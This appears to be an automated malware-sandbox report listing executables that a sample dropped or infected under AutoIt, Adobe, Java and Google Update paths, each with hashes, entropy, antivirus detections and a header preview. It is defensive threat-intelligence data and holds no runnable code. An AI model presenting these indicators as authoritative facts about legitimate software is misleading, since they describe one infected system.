SSDEEP:	49152:KfYP1JsEDkSR7Xgo4TiRPnLWvJFDmg27RnWGj:aYPBR7Xn4TiRCvJFD527BWG
MD5:	48E28662203AC3274C523222A6D5EB10
SHA1:	91C79AED8861FB2718BC1EEAC94B7D684F0A71B9
SHA-256:	C785E7ABE9029AC8340E7299E551D16EE9C5CB9B46BC31E926424CA1D157DF07
SHA-512:	4F88FC949454D33F28F881EB0B65D5E21361F1FA7A9AD2C17A1E53B1704B1B79A13385CB99B8CD1ED406737DA34517C13046B11DBB2219D9980103C2117F5BF6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....\|......}.a...p..i...p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245184
Entropy (8bit):	5.123551203059722
Encrypted:	false
SSDEEP:	12288:z62SYUcknnjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:4YUcknjsqjnhMgeiCl7G0nehbGZpbD
MD5:	6BEB16A1549FDD646C53C5BC746FC84B
SHA1:	C3E075AB8B97DD0EA7D969F1B126D0BB6267B3D2
SHA-256:	B41C7159C7D38A8647D0153B9FDA64749ABCC623BE0E4D75710A1059AE9616C7
SHA-512:	76800ACBB5DFC8C74870B9F1F33DCF96AF49ABEC0A5128581E896A9FA295DCEEF4A7ED3E289AB957FFDC96C9FABCE2A2C8A4A02B5CA9159C93CC4C5B0E37FB29
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@......c........................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1640448
Entropy (8bit):	7.1666548852593115
Encrypted:	false
SSDEEP:	49152:K+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaShDmg27RnWGj:uSktbpnD527BWG
MD5:	B95E5436F0B9C441678F937B835B057A
SHA1:	D7EA169505DB37F9E2C91639372D7B6BC157B208
SHA-256:	AC6DBB92AA4BD1A099370AEF3F698CB01E0AB74D11505C1898BCB73FD553E1F0
SHA-512:	E13B2378D57FA28AB3345FFAF9E41AAB7D55B97BE23A581771407E66DAF5A57BD1DF2A2A4048E4C8CD6CD18E4E4286584628E2A9E691F38FCEC01CC8BBAC5DCA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................@..... ...@...............@..............................l..\|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..\|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2953728
Entropy (8bit):	7.094611348666292
Encrypted:	false
SSDEEP:	49152:4GSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLqDmg27RnWGj:I4OEtwiICvYMRfKD527BWG
MD5:	9D16597ED1531074DB3D1D27297B33B4
SHA1:	6299DADB33E99A2B17473702FFAB6B1DDDA0DD30
SHA-256:	4296BBC44B27F2ADA1FC6982AF219FF0696BB08A695D5AB785B85999879F7838
SHA-512:	E8D81B6C3188C33A9581660085FE9F64859A6E9C6B08AD4411DC90298CDC1BAC09923F70BC314C3C4BD814B9508AC4981721FFD8B6C8AB381AC552DE4101B183
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.....0L-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1485824
Entropy (8bit):	5.496385296101847
Encrypted:	false
SSDEEP:	24576:fAMuR+3kMbVjhVsqjnhMgeiCl7G0nehbGZpbD:ID+lbVjhJDmg27RnWGj
MD5:	B02F722FBD5336B5AAB21ADEE8C30121
SHA1:	9EDB19C8A69921BB6B6A480C15FD8D36A47D4FCD
SHA-256:	604234B481273710C5C9423C9B52AF369099B9263399330EC68F66D63C97D499
SHA-512:	06F23A9E4BF2E2FA2454461728DFEC5CC5E31C30F81C8FD6FB81508E97AE4343DFDC7A9FF7E708220C616E899376371CECF01F1EDBFAACBEFE93A640FB2D1690
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@.........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290240
Entropy (8bit):	5.277769551384665
Encrypted:	false
SSDEEP:	12288:pImGUcsvZZdubv7hfl3yXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:pxGBcmlisqjnhMgeiCl7G0nehbGZpbD
MD5:	3A91CBC10690CDD19D04F068C7B34C44
SHA1:	96DBC0121CD9B12DF0C4FEEC0AF20DE49DAC79F9
SHA-256:	6D21D5EF98675E3E05FD17CE2E672A725BECEFB0596836BCE9D53E48734A363A
SHA-512:	55105D1B766ED4AA8EAE8979EB765AF3709E09C0BAADE9601FD5947646493A70D772958B05A911BB6171C4C45FEDECFF1B4A2950B669D0702255CB49B40D68BC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................p.......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1644544
Entropy (8bit):	5.694780656728966
Encrypted:	false
SSDEEP:	24576:70vHyeLj8trn3wszsqjnhMgeiCl7G0nehbGZpbD:Gtj4rgs3Dmg27RnWGj
MD5:	ACE31FEB6ECFB476D50152C18422DA86
SHA1:	DA79B213EBB627574C612A0A57E86B234718A6C9
SHA-256:	905CEF84F21DCE1A4F45A058A96C980DA22237F6929EE01C143D76512B691B6B
SHA-512:	0CB0E51B073E31D3D3054D38251A246ECC2E90E6D57864C69FE11F5A8EB4E7D12CDC465A090303835BED446531714D678838B7233D872FDAF245352EE8E83C36
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`......7!......................................<........P...\|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....\|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1781760
Entropy (8bit):	7.2796578522861575
Encrypted:	false
SSDEEP:	24576:4oMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/Z2sqjnhMgeiCl7G0nehbGZpv:N4i0wGJra0uAUfkVy7/Z6Dmg27RnWGj
MD5:	8B2623FD6FA40B79E5C2C17DF0D39D8F
SHA1:	A60F47FAE1BFF3A2852300A02F164D1236DAE51B
SHA-256:	E568D01575C60BF97A43AC32CBBCE9BF13DDD2A4A38DDBC7F24B4E6F4931B1AF
SHA-512:	8398AB699D6FABA540A34A398E9116EF96E4332DD3C75ED89D209045071D1ED7FE02B9341B8E1252F4274918D07362B3B2049CA8962845886A9FA105640FCF06
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................0i..........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1318400
Entropy (8bit):	7.44875400328834
Encrypted:	false
SSDEEP:	24576:XeR0gB6axoCf0R6RLQRF/TzJqe58BimNsqjnhMgeiCl7G0nehbGZpbD:RgHxmR6uBTzge5MimxDmg27RnWGj
MD5:	4F75FA083DB62A6027CEF1E681EFCF00
SHA1:	FB9F63F3C387768E42862840763CEEF8B8667153
SHA-256:	F63153A17F5246D067A19BBBC3522D5312688FC658FA465BB8F31D23A6EF7531
SHA-512:	B500173D571431409FE38DFE40164A5289ED79F067B503F27303FAA7A6EC0ABD82DE1BF8BAED8213094637DB16C041687B60ED2229B630B92CC139CEE4559AD8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`..............................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446057290091983
Encrypted:	false
SSDEEP:	12288:wnEbH0j4x7R6SvyCMDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:wkwOtO7DsqjnhMgeiCl7G0nehbGZpbD
MD5:	8660ADA713FD474958C57182855DC4E1
SHA1:	C821D585B3931302A2FFC723849A949CAB97E0C2
SHA-256:	C197669C9B553FECF30C52B5450D3AF0E8565BC8943310E4DC715578CA151EE0
SHA-512:	23087481D508F27B193CD330F62584B2BDA4C8A7D8E3CC2AB6AB08DC50CB5409546F78231213AA6AFC6F6B104BBA9135E5C66401FE6419E466905F57A4E41E38
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......C........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446797611680401
Encrypted:	false
SSDEEP:	24576:InU/h/4K0sqjnhMgeiCl7G0nehbGZpbD:IU/VQDmg27RnWGj
MD5:	2D5D0337C36631F63023A6C3F9019102
SHA1:	269A988BBE8B5B0DBBFE886AA1C58D4FDF570E29
SHA-256:	324D13E0D92B7BF6F3830650F149EE83B0574E379B6E7DA3D5A65818A7D4DD5C
SHA-512:	12D86FE8D9CCAE6F6056342C69FAD36AE24AE060B78ADAAED76595E33F2769B532C459E104F82AA7BD91975AF7A448B939A653441EC123302ACC4E60E0F3D23B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......4........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	5.4837144508632445
Encrypted:	false
SSDEEP:	24576:Ix71iBLZ05jNTmJWExHsqjnhMgeiCl7G0nehbGZpbD:IxhiHIjNgbDmg27RnWGj
MD5:	7B36013DA49F326E82FF7F5643357B0A
SHA1:	F2244AE4EE73B2EDD33D9F677FF5B66A2DA5BDC8
SHA-256:	E4D1F26B58127FA02AC42FCCF00C6D2B74F04AACB1EA01559EF41C7018896542
SHA-512:	7E4B22D1C3EA7265D4C4A458D8A59DF382D070D25C438422250DDCAD000951B60555E67A3CDBD1DDCA203723671240446A2EB391C5EC5C7751AFA43BFDB33837
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1419264
Entropy (8bit):	5.466703570987147
Encrypted:	false
SSDEEP:	24576:XlnRklQ6fgJcEwixVsqjnhMgeiCl7G0nehbGZpbD:roRfgJcEwCJDmg27RnWGj
MD5:	6544115AE1B03B733950369F4A95EE6C
SHA1:	412DFCEEC89765A5BB756FCA698CB487ADF6B37A
SHA-256:	2C1247E628A34F3DE8C00A5CDC0CE0E2390607E4D49EA55F00E0E72FF3E039EF
SHA-512:	05E0AA724614788BBAB39CFAA795A743BA88FE7D4FEFD603437FCB49AAD0AA797672DF4E35451A12E5C9A7F5CA22003B2F41E6E93C0DFD35785316399A95A3D8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@.........................................................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1522176
Entropy (8bit):	5.496522206782661
Encrypted:	false
SSDEEP:	24576:DW25k8hb0Haw+xFsqjnhMgeiCl7G0nehbGZpbD:DWyk8SHawm5Dmg27RnWGj
MD5:	7022DD470860579DC67B5AD40D657DA6
SHA1:	6925A51DA9B709394F4701BE036977C98F835711
SHA-256:	DB1DB3B984062A0E290C2FD7FDAE99F57C8729E84B0B37639ECD8284B0BC59D1
SHA-512:	3CFA0D922150D9E9B6AEAC1430BCDB595548450BB7B568E2B89D8B6E8DD8E555F4F822384EB9436C938D5DE7F67E20A81B2FFD3E54E94220C240DB941D89B29F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................R6.... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	5.163940549878187
Encrypted:	false
SSDEEP:	12288:MWP/aK2vB+iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:MKCKABdsqjnhMgeiCl7G0nehbGZpbD
MD5:	CA7CEC63F8D976629A0C653DD2D51051
SHA1:	DFF11A1F07929A40335A41A344A3E19146DF642A
SHA-256:	94FDB469377CF4E1F1A32D3C830652BC1165EC9C5FFA58D24A4A662BCC67A3B4
SHA-512:	AD7761874242C582C6AE2C38D1670DE48CDD1CAF0572BCA6702035B9CD7DC6F071684ADA11B35109287370F59C9B35E14FA130AAEEA17350FC1671247F13FC09
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U..Q..U..V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.................................l.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228288
Entropy (8bit):	5.162021041022901
Encrypted:	false
SSDEEP:	12288:RO7cCNWB+09EXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:AjNWBPysqjnhMgeiCl7G0nehbGZpbD
MD5:	51130C19E524F8B78FFAC53D0E355978
SHA1:	DE7D463386627B5686FF5758B2FBDF350E5B1C8F
SHA-256:	A04E49A51486326F14AF2E556F202D26F1F36B28C48FC80543CE4DB46D142013
SHA-512:	881DBC7A19EDECDDE6CB9414CEF4D188ACC3795A09CF2687521C8D43B082C3E77ADD84B60F275C1626567AFB909FD469336972B9C223F4FE9ABE4059E4799207
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1302528
Entropy (8bit):	5.238921799021413
Encrypted:	false
SSDEEP:	24576:IihRyhdsRrwsqjnhMgeiCl7G0nehbGZpbD:IihsoRsDmg27RnWGj
MD5:	982901BF0A8688FCEE234813EBD663DC
SHA1:	5C59D56F597E8CFD6E03AB12427DEE708821EF77
SHA-256:	927614C3C00250EB7D215A3BEC6087BA9D468099AFB2104560D9DB417A202D55
SHA-512:	B6A83A4C0070D7839860589883C506CCB72D5FEABDF857213107A8AE16D792B401595FD04C7D5257E47C45765704082175C99DD5E1BF20ABA279C4E586593C4B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~...X..~..X...2..X...2..X...2...X...3..X..~..X..~..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p......"L.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1342464
Entropy (8bit):	5.350985066116375
Encrypted:	false
SSDEEP:	24576:t1FDmRF+wpx/QafLsqjnhMgeiCl7G0nehbGZpbD:tmRF+wn/Jf/Dmg27RnWGj
MD5:	1371100EDDF77DEA47695B46721051C8
SHA1:	18FE74984E66039A80DCF3BD012BB71502D3FAED
SHA-256:	79DBEF71FB97CB1FE2E38294FE64A6D2D074141D9E6D802CC48AD5FC11545442
SHA-512:	37AEACAA357E53C94C18FFC8B68B0E86A9BD023C44D8A52B98342EC13384754A3CA87E4EB68FBBB6EEAF10FB779910A704FCFED1BF0B465AF2966351B847D026
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@..................................V...............................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228288
Entropy (8bit):	5.1619612119751785
Encrypted:	false
SSDEEP:	12288:r2Ae621B+0YWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:KE21BP5sqjnhMgeiCl7G0nehbGZpbD
MD5:	D3CE23F743A07E28ADCA50A2529B2B54
SHA1:	05378FB04BF006387AEB4716D691AF1676D59524
SHA-256:	E4FF6BC98FDB7BC44E013DB3BAACE9A520B2A2075E753116DC4622797D03657F
SHA-512:	6728AF045C844CA96AF44116B2E0C8AB178D2FE3D91B25A567A8B241CA52E4E40483D389D2BFC5C08FC0BD75B2753A225721178EA9973FE3523F6269ED62246C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	105669632
Entropy (8bit):	7.999989848223292
Encrypted:	true
SSDEEP:	3145728:WLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:0BWx/pt8U7E6aZRfIICU
MD5:	E1F241B37169B6E881A2ACBB3ABDD993
SHA1:	16BB5915CC451F8462CEBC92CAEAF562EA0B226D
SHA-256:	897D128D9FC858D3B7F7943DEF25F580C577C72BDD5DEE36C0C03D11AA365213
SHA-512:	DDB124DD2001C2039DCFDE7F30E690FEC99D41557D94C137CB926297543348BEA4E64D8BA17A36098F13FA8FDC5CE6B0F9A1E8D34D2B80980F30638AA2D9B1A8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
